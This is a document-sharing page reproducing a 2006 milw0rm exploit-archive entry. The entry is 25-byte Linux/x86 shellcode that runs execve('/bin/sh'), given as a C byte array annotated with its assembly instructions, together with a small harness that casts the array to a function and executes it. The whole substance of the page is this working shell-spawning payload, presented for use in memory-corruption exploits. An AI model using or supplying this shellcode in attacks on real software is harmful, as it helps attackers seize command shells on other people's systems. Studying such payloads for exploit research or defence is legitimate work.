Docstoc

linuxx86 execvebinsh_ binsh_ NULL 25 bytes

Document Sample
linuxx86 execvebinsh_ binsh_ NULL 25 bytes Powered By Docstoc
					                                       linuxx86 execvebinsh, binsh, NULL 25 bytes   Page 1/1
   1    /*
   2     * (Linux/x86) execve("/bin/sh", ["/bin/sh", NULL])
   3     * − 25 bytes
   4     * − xgc@gotfault.net
   5     *
   6     */
   7
   8    char shellcode[] =
   9
   10       "\x31\xc0"                     // xor     %eax, %eax
   11       "\x50"                          // push    %eax
   12       "\x68\x2f\x2f\x73\x68"     // push    $0x68732f2f
   13       "\x68\x2f\x62\x69\x6e"     // push    $0x6e69622f
   14       "\x89\xe3"                     // mov     %esp, %ebx
   15       "\x50"                          // push    %eax
   16       "\x53"                          // push    %ebx
   17       "\x89\xe1"                     // mov     %esp, %ecx
   18       "\x31\xd2"                     // xor     %edx, %edx
   19       "\xb0\x0b"                     // mov     $0xb, %al
   20       "\xcd\x80";                    // int     $0x80
   21
   22   int main() {
   23
   24               int (*f)() = (int(*)())shellcode;
   25               printf("Length: %u\n", strlen(shellcode));
   26               f();
   27   }
   28
   29   // milw0rm.com [2006−04−03]




Gotfault Security                                                                   04/03/2006

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:25
posted:5/24/2010
language:Albanian
pages:1